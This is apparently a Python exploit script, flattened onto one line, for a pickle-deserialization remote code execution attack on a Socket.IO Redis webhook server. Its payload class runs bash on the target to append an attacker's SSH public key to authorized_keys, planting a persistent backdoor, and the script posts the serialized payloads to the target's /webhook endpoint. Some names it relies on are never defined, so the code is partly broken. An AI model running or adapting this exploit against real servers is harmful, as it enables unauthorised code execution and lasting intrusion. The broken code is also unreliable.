#!/usr/bin/env python3 import os import sys import time import pickle import subprocess import requests import argparse import socket import threading import zipfile import tempfile import json import base64 from datetime import datetime from urllib.parse import quote class SSHBackdoorPayload: """Creates SSH backdoor by adding attacker's public key""" def __init__(self, ssh_public_key, username="ec2-user"): self.ssh_public_key = ssh_public_key self.username = username def __reduce__(self): # Multi-step command to create SSH backdoor cmd = [ 'bash', '-c', f'mkdir -p /home/{self.username}/.ssh /home/{self.username}/.ssh && ' f'echo "{self.ssh_public_key}" >> /home/{self.username}/.ssh/authorized_keys && ' f'chmod 700 /home/{self.username}/.ssh /home/{self.username}/.ssh && ' f'chmod 600 /home/{self.username}/.ssh/authorized_keys /home/{self.username}/.ssh/authorized_keys 2>/dev/null && ' f'chown -R {self.username}:{self.username} /home/{self.username}/.ssh 2>/dev/null && ' f'echo "SSH backdoor installed for {self.username}" > /tmp/evidence/ssh_backdoor.txt' ] return (subprocess.call, (cmd,)) def test_server_connection(server_url): try: response = requests.get(f"{server_url}/health", timeout=5) return response.status_code == 200 except Exception as e: print(f"[-] Server connection failed: {e}") return False def exploit(server_url, channel='socketio', ssh_key=None): print("🎯 Socket.IO Redis Pickle Exploitation (via HTTP)") print("=" * 50) print(f"Target Server: {server_url}") print(f"Channel: {channel}") print(f"Objective: RCE via pickle.loads() deserialization") print() # Filter payloads based on selected categories payloads = [] for name, payload_obj, categories in all_payloads: if 'all' in attack_categories or any(cat in attack_categories for cat in categories): payloads.append((name, payload_obj)) print(f" [*] Selected {len(payloads)} payloads based on categories: {', '.join(attack_categories)}") results = [] for name, payload in payloads: try: serialized = pickle.dumps(payload) print(f" [+] {name}: {len(serialized)} bytes") results.append((name, serialized)) except Exception as e: print(f" [-] {name}: Failed to serialize - {e}") # Send exploits via HTTP POST print(f"[3] Sending exploits to webhook server...") total_sent = 0 webhook_url = f"{server_url}/webhook" for name, payload_data in results: try: # Send raw pickle data as POST body headers = { 'Content-Type': 'application/octet-stream', 'X-Channel': channel, 'X-Payload-Name': name } response = requests.post( webhook_url, data=payload_data, headers=headers, timeout=10 ) if response.status_code == 200: resp_data = response.json() subscribers = resp_data.get('subscribers', 0) print(f" [+] {name}: HTTP 200, {subscribers} Redis subscribers") total_sent += 1 else: print(f" [-] {name}: HTTP {response.status_code} - {response.text[:100]}") time.sleep(0.5) # Small delay between requests except Exception as e: print(f" [-] {name}: Request failed - {e}") # Results if total_sent > 0: print(f"\n[+] EXPLOITATION SUCCESSFUL!") print(f" {total_sent} payload(s) sent via HTTP webhook") if ssh_key: print(f"\n[+] SSH Backdoor installed:") print(f" - Public key added to ~/.ssh/authorized_keys") return True else: print(f"\n[-] No payloads sent successfully") print(f" Check that webhook server is running at {server_url}") print(f" Server should accept POST requests to /webhook endpoint") return False def main(): parser = argparse.ArgumentParser(description='Socket.IO Redis Pickle Exploitation Demo (HTTP Webhook)') parser.add_argument('--url', default='http://localhost:6000', help='Webhook server URL (default: http://localhost:6000)') parser.add_argument('--channel', default='socketio', help='Socket.IO channel (default: socketio)') parser.add_argument('--ssh-key', default='', help='SSH public key to install as backdoor') parser.add_argument('--ssh-key-file', default='', help='File containing SSH public key') parser.add_argument('--test-only', action='store_true', help='Only test server connection') args = parser.parse_args() if not args.ssh_key and not args.ssh_key_file: print("[-] No SSH key provided. Please provide --ssh-key or --ssh-key-file") sys.exit(1) ssh_key = None if args.ssh_key: ssh_key = args.ssh_key elif args.ssh_key_file: try: with open(args.ssh_key_file, 'r') as f: ssh_key = f.read().strip() print(f"[*] Loaded SSH key from {args.ssh_key_file}") except Exception as e: print(f"[-] Failed to read SSH key file: {e}") sys.exit(1) if args.test_only: print("🔍 Testing webhook server connection...") success = test_server_connection(args.url) if success: print("[+] Server connection successful") sys.exit(0 if success else 1) success = exploit(args.url, args.channel, ssh_key) if success: print(f"\n[+] Exploitation completed successfully") print(f"[*] Categories tested: {', '.join(args.attack_categories)}") if ssh_key: print(f" - SSH backdoor should now be accessible on target servers") else: print(f"\n[-] Exploitation failed") if __name__ == '__main__': main()